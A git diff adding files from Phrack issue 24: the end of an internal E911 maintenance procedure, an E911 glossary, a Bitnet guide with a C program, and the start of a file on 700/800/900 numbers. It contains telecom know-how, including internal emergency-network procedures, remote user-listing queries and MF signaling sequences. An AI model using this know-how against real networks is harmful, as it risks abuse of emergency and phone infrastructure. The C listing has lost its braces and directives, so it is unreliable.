+by the BOCs, an independent company, or an outside vendor, or any combination.
+This information is then entered on the PSAP profile sheets and reviewed
+quarterly for changes, additions and deletions.
+
+Marketing will secure the Major Account Number (MAN) and provide this number to
+Corporate Communications so that the initial issue of the service orders carry
+the MAN and can be tracked by the SSC/MAC via CORDNET.  PSAP circuits are
+official services by definition.
+
+All service orders required for the installation of the E911 system should
+include the MAN assigned to the city/county which has purchased the system.
+
+In accordance with the basic SSC/MAC strategy for provisioning, the SSC/MAC
+will be Overall Control Office (OCO) for all Node to PSAP circuits (official
+services) and any other services for this customer.  Training must be scheduled
+for all SSC/MAC involved personnel during the pre-service stage of the project.
+
+The E911 Implementation Team will form the on-going maintenance subcommittee
+prior to the initial implementation of the E911 system.  This sub-committee
+will establish post implementation quality assurance procedures to ensure that
+the E911 system continues to provide quality service to the customer.
+Customer/Company training, trouble reporting interfaces for the customer,
+telephone company and any involved independent telephone companies needs to be
+addressed and implemented prior to E911 cutover.  These functions can be best
+addressed by the formation of a sub-committee of the E911 Implementation Team
+to set up guidelines for and to secure service commitments of interfacing
+organizations.  A SSC/MAC supervisor should chair this subcommittee and include
+the following organizations:
+
+1) Switching Control Center
+        - E911 translations
+        - Trunking
+        - End office and Tandem office hardware/software
+2) Recent Change Memory Administration Center
+        - Daily RC update activity for TN/ESN translations
+        - Processes validity errors and rejects
+3) Line and Number Administration
+        - Verification of TN/ESN translations
+4) Special Service Center/Major Account Center
+        - Single point of contact for all PSAP and Node to host troubles
+        - Logs, tracks & statusing of all trouble reports
+        - Trouble referral, follow up, and escalation
+        - Customer notification of status and restoration
+        - Analyzation of "chronic" troubles
+        - Testing, installation and maintenance of E911 circuits
+5) Installation and Maintenance (SSIM/I&M)
+        - Repair and maintenance of PSAP equipment and Telco owned sets
+6) Minicomputer Maintenance Operations Center
+        - E911 circuit maintenance (where applicable)
+7) Area Maintenance Engineer
+        - Technical assistance on voice (CO-PSAP) network related E911 troubles
+
+
+Maintenance Guidelines
+~~~~~~~~~~~~~~~~~~~~~~
+The CCNC will test the Node circuit from the 202T at the Host site to the 202T
+at the Node site.  Since Host to Node (CCNC to MMOC) circuits are official
+company services, the CCNC will refer all Node circuit troubles to the SSC/MAC.
+The SSC/MAC is responsible for the testing and follow up to restoration of
+these circuit troubles.
+
+Although Node to PSAP circuit are official services, the MMOC will refer PSAP
+circuit troubles to the appropriate SSC/MAC.  The SSC/MAC is responsible for
+testing and follow up to restoration of PSAP circuit troubles.
+
+The SSC/MAC will also receive reports from CRSAB/IMC(s) on subscriber 911
+troubles when they are not line troubles.  The SSC/MAC is responsible for
+testing and restoration of these troubles.
+
+Maintenance responsibilities are as follows:
+
+SCC*            Voice Network (ANI to PSAP)
+                *SCC responsible for tandem switch
+SSIM/I&M        PSAP Equipment (Modems, CIU's, sets)
+Vendor          PSAP Equipment (when CPE)
+SSC/MAC         PSAP to Node circuits, and tandem to PSAP voice circuits (EMNT)
+MMOC            Node site (Modems, cables, etc)
+
+Note:  All above work groups are required to resolve troubles by interfacing
+       with appropriate work groups for resolution.
+
+The Switching Control Center (SCC) is responsible for E911/1AESS translations
+in tandem central offices.  These translations route E911 calls, selective
+transfer, default routing, speed calling, etc., for each PSAP.  The SCC is also
+responsible for troubleshooting on the voice network (call originating to end
+office tandem equipment).
+
+For example, ANI failures in the originating offices would be a responsibility
+of the SCC.
+
+Recent Change Memory Administration Center (RCMAC) performs the daily tandem
+translation updates (recent change) for routing of individual telephone
+numbers.
+
+Recent changes are generated from service order activity (new service, address
+changes, etc.) and compiled into a daily file by the E911 Center (ALI/DMS E911
+Computer).
+
+SSIM/I&M is responsible for the installation and repair of PSAP equipment.
+PSAP equipment includes ANI Controller, ALI Controller, data sets, cables,
+sets, and other peripheral equipment that is not vendor owned.  SSIM/I&M is
+responsible for establishing maintenance test kits, complete with spare parts
+for PSAP maintenance.  This includes test gear, data sets, and ANI/ALI
+Controller parts.
+
+Special Services Center (SSC) or Major Account Center (MAC) serves as the
+trouble reporting contact for all (PSAP) troubles reported by customer.  The
+SSC/MAC refers troubles to proper organizations for handling and tracks status
+of troubles, escalating when necessary.  The SSC/MAC will close out troubles
+with customer.  The SSC/MAC will analyze all troubles and tracks "chronic" PSAP
+troubles.
+
+Corporate Communications Network Center (CCNC) will test and refer troubles on
+all node to host circuits.  All E911 circuits are classified as official
+company property.
+
+The Minicomputer Maintenance Operations Center (MMOC) maintains the E911
+(ALI/DMS) computer hardware at the Host site.  This MMOC is also responsible
+for monitoring the system and reporting certain PSAP and system problems to the
+local MMOC's, SCC's or SSC/MAC's.  The MMOC personnel also operate software
+programs that maintain the TN data base under the direction of the E911 Center.
+The maintenance of the NODE computer (the interface between the PSAP and the
+ALI/DMS computer) is a function of the MMOC at the NODE site.  The MMOC's at
+the NODE sites may also be involved in the testing of NODE to Host circuits.
+The MMOC will also assist on Host to PSAP and data network related troubles not
+resolved through standard trouble clearing procedures.
+
+Installation And Maintenance Center (IMC) is responsible for referral of E911
+subscriber troubles that are not subscriber line problems.
+
+E911 Center - Performs the role of System Administration and is responsible for
+overall operation of the E911 computer software.  The E911 Center does A-Z
+trouble analysis and provides statistical information on the performance of the
+system.
+
+This analysis includes processing PSAP inquiries (trouble reports) and referral
+of network troubles.  The E911 Center also performs daily processing of tandem
+recent change and provides information to the RCMAC for tandem input.  The E911
+Center is responsible for daily processing of the ALI/DMS computer data base
+and provides error files, etc. to the Customer Services department for
+investigation and correction.  The E911 Center participates in all system
+implementations and on-going maintenance effort and assists in the development
+of procedures, training and education of information to all groups.
+
+Any group receiving a 911 trouble from the SSC/MAC should close out the trouble
+with the SSC/MAC or provide a status if the trouble has been referred to
+another group.  This will allow the SSC/MAC to provide a status back to the
+customer or escalate as appropriate.
+
+Any group receiving a trouble from the Host site (MMOC or CCNC) should close
+the trouble back to that group.
+
+The MMOC should notify the appropriate SSC/MAC when the Host, Node, or all Node
+circuits are down so that the SSC/MAC can reply to customer reports that may be
+called in by the PSAPs.  This will eliminate duplicate reporting of troubles.
+On complete outages the MMOC will follow escalation procedures for a Node after
+two (2) hours and for a PSAP after four (4) hours.  Additionally the MMOC will
+notify the appropriate SSC/MAC when the Host, Node, or all Node circuits are
+down.
+
+The PSAP will call the SSC/MAC to report E911 troubles.  The person reporting
+the E911 trouble may not have a circuit I.D. and will therefore report the PSAP
+name and address.  Many PSAP troubles are not circuit specific.  In those
+instances where the caller cannot provide a circuit I.D., the SSC/MAC will be
+required to determine the circuit I.D. using the PSAP profile.  Under no
+circumstances will the SSC/MAC Center refuse to take the trouble.  The E911
+trouble should be handled as quickly as possible, with the SSC/MAC providing as
+much assistance as possible while taking the trouble report from the caller.
+
+The SSC/MAC will screen/test the trouble to determine the appropriate handoff
+organization based on the following criteria:
+
+    PSAP equipment problem:  SSIM/I&M
+    Circuit problem:  SSC/MAC
+    Voice network problem:  SCC (report trunk group number)
+    Problem affecting multiple PSAPs (No ALI report from all PSAPs):  Contact
+                                     the MMOC to check for NODE or Host
+                                     computer problems before further testing.
+
+The SSC/MAC will track the status of reported troubles and escalate as
+appropriate.  The SSC/MAC will close out customer/company reports with the
+initiating contact.  Groups with specific maintenance responsibilities, defined
+above, will investigate "chronic" troubles upon request from the SSC/MAC and
+the ongoing maintenance subcommittee.
+
+All "out of service" E911 troubles are priority one type reports.  One link
+down to a PSAP is considered a priority one trouble and should be handled as if
+the PSAP was isolated.
+
+The PSAP will report troubles with the ANI controller, ALI controller or set
+equipment to the SSC/MAC.
+
+NO ANI:  Where the PSAP reports NO ANI (digital display screen is blank) ask if
+this condition exists on all screens and on all calls.  It is important to
+differentiate between blank screens and screens displaying 911-00XX, or all
+zeroes.
+
+When the PSAP reports all screens on all calls, ask if there is any voice
+contact with callers.  If there is no voice contact the trouble should be
+referred to the SCC immediately since 911 calls are not getting through which
+may require alternate routing of calls to another PSAP.
+
+When the PSAP reports this condition on all screens but not all calls and has
+voice contact with callers, the report should be referred to SSIM/I&M for
+dispatch.  The SSC/MAC should verify with the SCC that ANI is pulsing before
+dispatching SSIM.
+
+When the PSAP reports this condition on one screen for all calls (others work
+fine) the trouble should be referred to SSIM/I&M for dispatch, because the
+trouble is isolated to one piece of equipment at the customer premise.
+
+An ANI failure (i.e. all zeroes) indicates that the ANI has not been received
+by the PSAP from the tandem office or was lost by the PSAP ANI controller.  The
+PSAP may receive "02" alarms which can be caused by the ANI controller logging
+more than three all zero failures on the same trunk.  The PSAP has been
+instructed to report this condition to the SSC/MAC since it could indicate an
+equipment trouble at the PSAP which might be affecting all subscribers calling
+into the PSAP.  When all zeroes are being received on all calls or "02" alarms
+continue, a tester should analyze the condition to determine the appropriate
+action to be taken.  The tester must perform cooperative testing with the SCC
+when there appears to be a problem on the Tandem-PSAP trunks before requesting
+dispatch.
+
+When an occasional all zero condition is reported, the SSC/MAC should dispatch
+SSIM/I&M to routine equipment on a "chronic" troublesweep.
+
+The PSAPs are instructed to report incidental ANI failures to the BOC on a PSAP
+inquiry trouble ticket (paper) that is sent to the Customer Services E911 group
+and forwarded to E911 center when required.  This usually involves only a
+particular telephone number and is not a condition that would require a report
+to the SSC/MAC.  Multiple ANI failures which our from the same end office (XX
+denotes end office), indicate a hard trouble condition may exist in the end
+office or end office tandem trunks.  The PSAP will report this type of
+condition to the SSC/MAC and the SSC/MAC should refer the report to the SCC
+responsible for the tandem office.  NOTE: XX is the ESCO (Emergency Service
+Number) associated with the incoming 911 trunks into the tandem.  It is
+important that the C/MAC tell the SCC what is displayed at the PSAP (i.e.
+911-0011) which indicates to the SCC which end office is in trouble.
+
+Note:  It is essential that the PSAP fill out inquiry form on every ANI
+       failure.
+
+The PSAP will report a trouble any time an address is not received on an
+address display (screen blank) E911 call.  (If a record is not in the 911 data
+base or an ANI failure is encountered, the screen will provide a display
+noticing such condition).  The SSC/MAC should verify with the PSAP whether the
+NO ALI condition is on one screen or all screens.
+
+When the condition is on one screen (other screens receive ALI information) the
+SSC/MAC will request SSIM/I&M to dispatch.
+
+If no screens are receiving ALI information, there is usually a circuit trouble
+between the PSAP and the Host computer.  The SSC/MAC should test the trouble
+and refer for restoral.
+
+Note:  If the SSC/MAC receives calls from multiple PSAP's, all of which are
+       receiving NO ALI, there is a problem with the Node or Node to Host
+       circuits or the Host computer itself.  Before referring the trouble the
+       SSC/MAC should call the MMOC to inquire if the Node or Host is in
+       trouble.
+
+Alarm conditions on the ANI controller digital display at the PSAP are to be
+reported by the PSAP's.  These alarms can indicate various trouble conditions  o
+so the SSC/MAC should ask the PSAP if any portion of the E911 system is not
+functioning properly.
+
+The SSC/MAC should verify with the PSAP attendant that the equipment's primary
+function is answering E911 calls.  If it is, the SSC/MAC should request a
+dispatch SSIM/I&M.  If the equipment is not primarily used for E911, then the
+SSC/MAC should advise PSAP to contact their CPE vendor.
+
+Note:  These troubles can be quite confusing when the PSAP has vendor equipment
+       mixed in with equipment that the BOC maintains.  The Marketing
+       representative should provide the SSC/MAC information concerning any
+       unusual or exception items where the PSAP should contact their vendor.
+       This information should be included in the PSAP profile sheets.
+
+ANI or ALI controller down:  When the host computer sees the PSAP equipment
+down and it does not come back up, the MMOC will report the trouble to the
+SSC/MAC; the equipment is down at the PSAP, a dispatch will be required.
+
+PSAP link (circuit) down:  The MMOC will provide the SSC/MAC with the circuit
+ID that the Host computer indicates in trouble.  Although each PSAP has two
+circuits, when either circuit is down the condition must be treated as an
+emergency since failure of the second circuit will cause the PSAP to be
+isolated.
+
+Any problems that the MMOC identifies from the Node location to the Host
+computer will be handled directly with the appropriate MMOC(s)/CCNC.
+
+Note:  The customer will call only when a problem is apparent to the PSAP.
+       When only one circuit is down to the PSAP, the customer may not be aware
+       there is a trouble, even though there is one link down, notification
+       should appear on the PSAP screen.  Troubles called into the SSC/MAC from
+       the MMOC or other company employee should not be closed out by calling
+       the PSAP since it may result in the customer responding that they do not
+       have a trouble.  These reports can only be closed out by receiving
+       information that the trouble was fixed and by checking with the company
+       employee that reported the trouble.  The MMOC personnel will be able to
+       verify that the trouble has cleared by reviewing a printout from the
+       host.
+
+When the CRSAB receives a subscriber complaint (i.e., cannot dial 911) the RSA
+should obtain as much information as possible while the customer is on the
+line.
+
+For example, what happened when the subscriber dialed 911?  The report is
+automatically directed to the IMC for subscriber line testing.  When no line
+trouble is found, the IMC will refer the trouble condition to the SSC/MAC.  The
+SSC/MAC will contact Customer Services E911 Group and verify that the
+subscriber should be able to call 911 and obtain the ESN.  The SSC/MAC will
+verify the ESN via 2SCCS.  When both verifications match, the SSC/MAC will
+refer the report to the SCC responsible for the 911 tandem office for
+investigation and resolution.  The MAC is responsible for tracking the trouble
+and informing the IMC when it is resolved.
+
+
+For more information, please refer to E911 Glossary of Terms.
+_______________________________________________________________________________
diff --git a/phrack24/6.txt b/phrack24/6.txt
new file mode 100644
index 0000000..6e4d07d
--- /dev/null
+++ b/phrack24/6.txt
@@ -0,0 +1,193 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 24, File 6 of 13
+
+         [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
+         []                                                        []
+         []                  Glossary Terminology                  []
+         []                For Enhanced 911 Services               []
+         []                                                        []
+         []                   By The Eavesdropper                  []
+         []                                                        []
+         []                       March, 1988                      []
+         []                                                        []
+         [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
+
+
+E911 - Enhanced 911:  Features available include selective routing, selective
+       transfer, fixed transfer, alternate routing, default routing, Automatic
+       Number Display, Automatic Location Identification, night service,
+       default routing, call detail record.
+
+End Office - Telephone central office which provides dial tone to the
+             subscriber calling 911.  The "end office" provides ANI (Automatic
+             Number Identification) to the tandem office.
+
+Tandem Office - Telephone central office which serves as a tandem (or hub) for
+                all 911 calls.  Must be a 1AESS type of central office.  The
+                tandem office translations contain the TN/ESN relationships
+                which route the 911 call to the proper SAP.  The tandem office
+                looks up the ANI (TN) that it receives from the end office and
+                finds the ESN (routing information) which corresponds to a
+                seven digit number ringing in at a PSAP.
+
+PSAP - Public Safety Answering Point, usually the police, fire and/or rescue
+       groups as determined by the local municipalities.  A "ringin" will not
+       have ANI or ALI capabilities, but just receives calls or transferred
+       calls from another PSAP.
+
+ESN - Emergency Service Number (XXX) that is assigned to the subscriber's
+      telephone number in the tandem office translations The ESN represents a
+      seven digit number by which the tandem office routes the call to the
+      proper PSAP.  PSAPs with ALI capabilities also receive a display of the
+      ESN information which shows which police, fire and rescue agency serves
+      the telephone number calling 911.  An ESN is a unique combination of
+      police, fire, and rescue service for purposes of routing the E911 call.
+
+ANI - Automatic Number Identification corresponds to the subscriber's seven
+      digit telephone number.  The ANI displays at the PSAP on the digital ANI
+      display console.
+
+ALI - Automatic Location Identification provides for an address display of the
+      subscriber calling 911.  With ALI, the PSAP receives the ANI display and
+      an ALI display on a screen.  The ALI display includes the subscriber's
+      address, community, state, type of service and if a business, the name of
+      the business.  The PSAP will also get a display of the associated ESN
+      information (police, fire, rescue).
+
+Selective Routing - The capability to route a call to the particular PSAP
+                    serving the address associated with the TN making the 911
+                    call.  Selective routing is achieved by building TN/ESN
+                    translations in the tandem central office.  These
+                    translations are driven by the E911 data base which assigns
+                    the ESN to each telephone number based on the customer's
+                    address.  Service order activity keeps the E911 data base
+                    updated.  The E911 data base, in turn, generates recent
+                    change to the tandem office (through the SCC or RCMAC) to
+                    update the TN/ESN translations in the tandem data base.
+
+Selective Transfer - Provides the PSAP with the ability to transfer the
+                     incoming 911 call to a fire or rescue service for the
+                     particular number calling 911 by pushing one button for
+                     fire or rescue.  For example, if an incoming 911 call was
+                     reporting a fire, the PSAP operator would push the fire
+                     button on the ANI console; the call would go back to the
+                     tandem office, do a lookup for the seven digit number
+                     associated with fire department, for the ESN assigned to
+                     the calling TN, and automatically route the call to that
+                     fire department.  This differs from "fixed" transfer which
+                     routes every call to the same fire or rescue number
+                     whenever the fire or rescue button is pushed.  The PSAP
+                     equipment is optioned to provide either fixed or selective
+                     transfer capabilities.
+
+Alternate Routing - Alternate routing provides for a predetermined routing for
+                    911 calls when the tandem office is unable to route the
+                    calls over the 911 trunks for a particular PSAP due to
+                    troubles or all trunks busy.
+
+Default Routing - Provides for routing of 911 calls when there is an ANI
+                  failure.  The call will be routed to the "default" ESN
+                  associated with the he NNX the caller is calling from.
+                  Default ESNs are preassigned in translations and are usually
+                  the predominant ESN for a given wire center.
+
+Night Service - Night service works the same as alternate routing in that the
+                calls coming into a given PSAP will automatically be routed to
+                another preset PSAP when all trunks are made busy due to the
+                PSAP closing down for the night.
+
+Call Detail Record - When the 911 call is terminated by the PSAP operator, the
+                     ANI will automatically print-out on the teletypewriter
+                     located at the PSAP.  The printout will contain the time
+                     the call came into the PSAP, the time it was picked up by
+                     an operator, the operator number, the time the call was
+                     transferred, if applicable, the time the call was
+                     terminated and the trunk group number associated with the
+                     call.  Printouts of the ALI display are now also
+                     available, if the PSAP has purchased the required
+                     equipment.
+
+ANI Failure - Failure of the end office to identify the call and provide the
+              ANI (telephone number) to the tandem office; or, an ANI failure
+              between the tandem office and the PSAP.
+
+Misroute - Any condition that results in the 911 call going to the wrong PSAP.
+           A call can be misrouted if the ESN and associated routing
+           information are incorrect in the E911 data base and/or tandem data
+           base.  A call can also be misrouted if the call is an ANI failure,
+           which automatically default routes.
+
+Anonymous Call - If a subscriber misdials and dials the seven digit number
+                 associated with the PSAP position, they will come in direct
+                 and ANI display as 911-0000 which will ALI as an anonymous
+                 call.  The seven digit numbers associated with the PSAP
+                 positions are not published even to the PSAPs.
+
+Spurious 911 Call - Occasionally, the PSAP will get a call that is not
+                    associated with a subscriber dialing 911 for an emergency.
+                    It could be a subscriber who has not dialed 911, but is
+                    dialing another number, or has just picked up their phone
+                    and was connected with the PSAP.  These problems are
+                    equipment related, particularly when the calls originate
+                    from electromechanical or step by step offices, and are
+                    reported by the E911 Center to Network Operations upon
+                    receipt of the PSAP inquiry reporting the trouble.  The
+                    PSAP may get a call and no one is there; if they call the
+                    number back, the number may be disconnected or no one home.
+                    Again these are network troubles and must be investigated.
+                    Cordless telephones can also generate "spurious" calls in
+                    to the PSAPs.  Generally, the PSAP will hear conversation
+                    on the line, but the subscribers are not calling 911.  The
+                    PSAP may report spurious calls to to repair if they become
+                    bothersome, for example, the same number ringing in
+                    continually.
+
+No Displays - A condition where the PSAP ALI display screen is blank.  This
+              type of trouble should be reported immediately to the SSC/MAC.
+              If all screens at the PSAP are blank, it is an indication that
+              the problem is in the circuits from the PSAP to the E911
+              computer.  If more than one PSAP is experiencing no display, it
+              may be a problem with the Node computer or the E911 computer.
+              The SSC/MAC should contact the MMOC to determine the health of
+              the HOST computer.
+
+Record Not Found - If the host computer is unable to do a look up on a given
+                   ANI request from the PSAP, it will forward a Record Not
+                   Found message to the PSA ALI screen.  This is caused by
+                   service order activity for a given subscriber not being
+                   processed into the E911 data base, or HOST computer system
+                   problems whereby the record cannot be accessed at that point
+                   in time.
+
+No ANI - This condition means the PSAP received a call, but no telephone number
+         displayed on the ANI console.  The PSAP should report this condition
+         immediately to the SSC/MAC.
+
+PSAP Not Receiving Calls - If a PSAP cannot receive calls or request retrievals
+                           from the E911 host computer, i.e., cable cut, the
+                           calls into that PSAP must be rerouted to another
+                           PSAP.  The Switching Control Center must be notified
+                           to reroute the calls in the tandem office E911
+                           translations.
+
+MSAG - Master Street Address Guide.  The MSAG ledgers are controlled by the
+       municipality which has purchased the E911 ALI service, in that they
+       assign which police, fire or rescue agency will serve a given street and
+       number range.  They do this by assigning an ESN to each street range,
+       odd, even, community that is populated in the county or municipality
+       served.  These MSAGs are then used as a filter for service order
+       activity into the E911 computer data base to assign ESNs to individual
+       TN records.  This insures that each customer will be routed to the
+       correct agency for their particular address.  In a non-ALI County, TAR
+       codes are used by the Telephone company to assign ESNs to service
+       conductivity and the County does not control the ESN assignment.  TAR
+       codes represent the taxing authority for the given subscriber which
+       should correspond to their police, fire and rescue agencies.  The MG
+       method, of course, is more accurate because it is using the actual
+       service address of the customer to route the call and provides the
+       county with more flexibility in assigning fire and rescue district, etc.
+       The Customer Services E911 Group maintains the E911 computer data base
+       and interfaces with the County (customer) on all MSAG or data base
+       activity.
+_______________________________________________________________________________
diff --git a/phrack24/7.txt b/phrack24/7.txt
new file mode 100644
index 0000000..66a9b17
--- /dev/null
+++ b/phrack24/7.txt
@@ -0,0 +1,217 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 24, File 7 of 13
+
+               ()()()()()()()()()()()()()()()()()()()()()()()()
+               ()                                            ()
+               ()         Advanced Bitnet Procedures         ()
+               ()                                            ()
+               ()                     by                     ()
+               ()                                            ()
+               ()          VAXBusters International          ()
+               ()                                            ()
+               ()()()()()()()()()()()()()()()()()()()()()()()()
+
+
+Greetings!  I have taken the time to write up a file about some of the more
+complex operations on Bitnet.  I hope you enjoy it!                         :-)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+You can send multiple messages to one user@node under VAX/VMS & JNET by just
+typing;
+
+          $ SEND/REMOTE <host> <user>
+
+This will collect messages from the terminal until an empty line or CTRL-Z is
+entered.
+
+Under Unix, the UREP package is popular to connect Unix boxes to Bitnet.  The
+important user commands are as follows:
+
+
+Messages
+~~~~~~~~
+netwrite user@host
+
+Send one or more messages to the specified Bitnet user.  Netwrite reads
+messages from it's standard input until an EOF is reached.  If called from a
+terminal, netwrite will terminate on an empty line as well.
+
+When you receive Bitnet messages on a Unix host, UREP looks for an executable
+file named .exwrite in your home directory.  If it doesn't find such a file,
+the message is simply spit on your terminal.  If .exwrite is present, UREP
+executes this program (which can be a shell script) with five parameters:
+
+        <To System> <To User> <From System> <From User> <Tty>
+
+The <Tty> parameter tells the terminal to which UREP wanted to send the
+message.  UREP then feeds the messages to .exwrite as standard input.  The
+format of standard input is as follows:
+
+        <count (1 byte)><message (<count> bytes)>
+
+To display these messages you need to have a "C" program, since a shell script
+is not capable of handling single bytes painlessly.  I included my exwrite.c at
+the end of this file for a start.
+
+Typically, .exwrite is used to log all incoming Bitnet messages.  You can of
+course blow it up to send messages back to the sender when you're out to lunch,
+etc. BTW, .exwrite is called with the user ID of the receiving user, so it's no
+real security hole.
+
+
+File Transfer
+~~~~~~~~~~~~~
+netcopy user@host [ options ]
+
+Copy a file to the specified Bitnet user.  The most important option is
+"name=<fname>.<ftype>", with which you can specify the file name to be used
+at the recipient's machine.  More details are in the manual page.
+
+When you receive Bitnet files on a Unix machine running UREP, they will
+be placed in your home directory under the name ":<fname>.<ftype>".  These
+files are in NETDATA format, and they have to be converted to ASCII text files
+when you want to use them under Unix.  This can be done with the command;
+
+netdata [ <input_file> [ <output_file> ] ]
+
+When <input_file> is unspecified, standard input is used.  If <output_file> is
+unspecified, standard output is used.
+
+
+Bitnet Commands
+~~~~~~~~~~~~~~~
+Though Bitnet has no remote login capability, you can execute a (restricted)
+set of commands on remote hosts.  These commands can be used to query node
+status, lists of logged-on users, time and some other things.
+
+This works as follows:
+
+        JNET:   $ SEND/COMMAND <host> [ <command> ]
+        UREP:   % netexec <host> [ <command> ]
+        CMS:    SMSG <server> CMD <host> <command>
+
+The <server> under CMS is the Bitnet control process.  In Europe, it is
+normally called "EARN."  In the USA, it could be "BITNET" or maybe "RSCS."
+You're on your own here.
+
+The <host> is the Bitnet host name which you want to execute the <command>.
+With JNET and UREP, you will be asked for multiple commands when you leave the
+<command> field empty.  Again, input is terminated with EOF or an empty line.
+
+I have found the following commands useful in daily life:
+
+        CPQ N           Get a list of the users currently logged in at the
+                        <host>.  This command is supposed to exist on every
+                        Bitnet host, but some system managers like to restrict
+                        it for security reasons.  On JNET and UREP hosts,
+                        FINGER performs a similar, but more elaborate function.
+
+        CPQ T           Make <host> tell you the current time at it's location.
+
+        Q <otherhost>   Make <host> tell you what the next hop to <otherhost>
+                        is.  This is useful when you're interested in the
+                        network topology.
+
+        Q <ohost> A     This makes <host> tell you what file is currently
+                        active (being transmitted) for <ohost>.  This only
+                        works for machines which are directly connected to
+                        <host>.
+
+        Q <ohost> Q     This makes <host> show you the queue of files currently
+                        waiting for transmission to <ohost>.  This is useful
+                        when you want to trace some file which you sent to the
+                        network.
+
+        Q SYS           This makes <host> tell you about the RSCS links it has.
+
+Unfortunately, MVS-Hosts don't understand any of these commands, but simply
+give an error message.  You can recognize these things by the string "HASP"
+somewhere in the error message.
+
+        Enjoy !
+
+exwrite.c For Unix Hosts Running UREP
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+<-- cut here -->
+/* exwrite.c - formatter for UREP rscs messages                         */
+
+include <stdio.h>
+include <sysexits.h>
+include <pwd.h>
+include <ctype.h>
+
+main(argc, argv)
+
+        int             argc;
+        char            *argv[];
+       struct  passwd  *pw;
+        char            fname[255];
+        FILE            *term;
+        FILE            *log;
+        int             count;
+        char            buf[1024];
+        char            *from_user;
+        char            *from_host;
+        char            *to_user;
+        char            *to_host;
+        char            *to_tty;
+        char            *home_dir = "/tmp";
+
+        if (argc != 6)
+                fprintf(stderr, "%s: Invalid arguments\n", argv[0]);
+                exit(EX_USAGE);
+
+
+        /* initialise variables                                         */
+        to_host = argv[1];
+        to_user = argv[2];
+        from_host = argv[3];
+        from_user = argv[4];
+        to_tty = argv[5];
+
+        /* convert the receiving user to lowercase.  Under Unix, all    *
+         * user names normally are lower case, and we need a valid      *
+         * user name to determine the home directory                    */
+        for (; *to_user; to_user++)
+                *to_user = tolower(*to_user);
+        to_user = argv[2];
+
+        /* get the home directory of the receiving user                 */
+        if (pw = getpwnam(to_user))
+                home_dir = pw->pw_dir;
+
+        /* open the terminal, exit if the open fails                    */
+        sprintf(fname, "/dev/%s", to_tty);
+        if (!(term = fopen(fname, "w")))
+                exit(EX_OSERR);
+
+        /* open the rscs log file                                       */
+        sprintf(fname, "%s/.rscslog", home_dir);
+        log = fopen(fname, "a");
+
+        /* if the message is not coming from the relay, write the       *
+         * sending user and host name to the specified terminal         */
+        if (strcmp(from_user, "RELAY"))
+                fprintf(term, "From %s@%s:\r\n", from_user, from_host);
+
+        /* read in the RSCS messages and send them to the terminal      *
+         * and to the logfile if it has been opened.                    *
+         * In the log file, all lines are preceded by the sending user  *
+         * and host name.                                               */
+        while ((count = getchar()) != EOF)
+                if ((count = fread(buf, 1, count, stdin)) > 0)
+                        fwrite(buf, 1, count, term);
+                        fprintf(term, "\r\n");
+                        if (log)
+                                fprintf(log, "%s@%s: ", from_user, from_host);
+                                fwrite(buf, 1, count, log);
+                                fprintf(log, "\n");
+
+
+
+
+        exit(EX_OK);
+_______________________________________________________________________________
diff --git a/phrack24/8.txt b/phrack24/8.txt
new file mode 100644
index 0000000..a33c5de
--- /dev/null
+++ b/phrack24/8.txt
@@ -0,0 +1,473 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 24, File 8 of 13
+
+                /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\
+                /^\                                         /^\
+                /^\           Special Area Codes            /^\
+                /^\                                         /^\
+                /^\            by >Unknown User<            /^\
+                /^\                                         /^\
+                /^\             January 3, 1989             /^\
+                /^\                                         /^\
+                /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\ /^\
+
+
+Greetings!  I have compiled information about the SACs for your edification;
+these include 700, 800, and 900.
+
+Most telephone users from the United States are quite familiar with 800
+service:  A number that they dial and incur NO charge (not even message units
+in most areas).
+
+Then there is 900 service, which is what most people perceive as 'value added,'
+i.e. you pay more for the information than for the transport of the call.
+These vary typically from 35 cents to a few dollars for either a timed service,
+or a 'as long as you like' duration-sensitive service.  There are two
+sub-species of 900 service:  AT&T and "everybody else."
+
+Finally, there is 700 service, which many people remember as Alliance
+Teleconferencing.  This is the third "canonical" SAC.  With few limitations,
+this SAC is given over to the IEC entirely.
+
+Let's look at these in more detail.
+
+
+800 Service
+~~~~~~~~~~~
+800 service is offered by various IECs.  Each NXX in the 800 SAC is assigned to
+a given carrier, who is responsible for assigning numbers from that block to
+customers, and providing 10 digit translation.
+
+The carrier must have Feature Group D presence for originating calls from the
+originating exchange (either direct, or through an access tandem).
+
+In the future, when CCIS becomes wide-spread, a query will be made in the
+database [Who gets 1-800-985-1234?] and the call will be routed appropriately.
+To clarify:  Now the carrier is determined by the NNX.  In the future, the
+carrier will be determined by the entire 7 digits.
+
+A similar situation exists with 900 service.  Each carrier can reserve NXXs
+from BellCore (the people who among a zillion other tasks are in charge of
+handing out prefixes and area codes).  They're not cheap!  To get the actual
+number is free (there are qualifications that I don't deal with), but to get it
+'turned on' in a LATA costs you money, depending on:
+
+     (1) How many prefixes you're getting,
+     (2) Whether it's 800 or 900 service; and,
+     (3) How many Tandems/End Offices are in the LATA.
+
+It requires a discrete amount of labor for EACH office, because EACH routing
+table must be modified.  However, I will be discussing 900 Service in more
+detail later in this file.
+
+When you, as Joe Customer, dial 1-800-222-1234 (made up number, please don't
+bother them) it will initiate the following sequence:
+
+     1.  If you are in an Electronic Office (DMS-100, DMS-200, 1A ESS, 5 ESS)
+         the 800-222 will be translated to "AT&T" and will search for an
+         opening in a trunk group marked for 800 origination.  Should none be
+         found, bump to step 3.
+
+     2.  If you are in a non-electronic office (SxS, XB, and some flavors of
+         ESS), it will go to the access tandem that your office 'homes' on,
+         where 800-222 will be translated to "AT&T."
+
+         Note:  If at this point, the number doesn't have a translation, you
+                will get a "lose" recording from the CO.
+
+     3.  Find a trunk in a trunk group marked for 800 origination.  Should none
+         be found, give the customer a recording "Due to network congestion,
+         your 800 call could not be completed" or die, or whatever.  (Depends
+         on phase of moon, etc.)
+
+     4.  The end office will the send the following pulse-stream (in MF):
+         KP + II + 3/10D + ST + KP + 800 222 1234 + ST
+
+         Note:  This is a simplification; there are some fine points of ANI
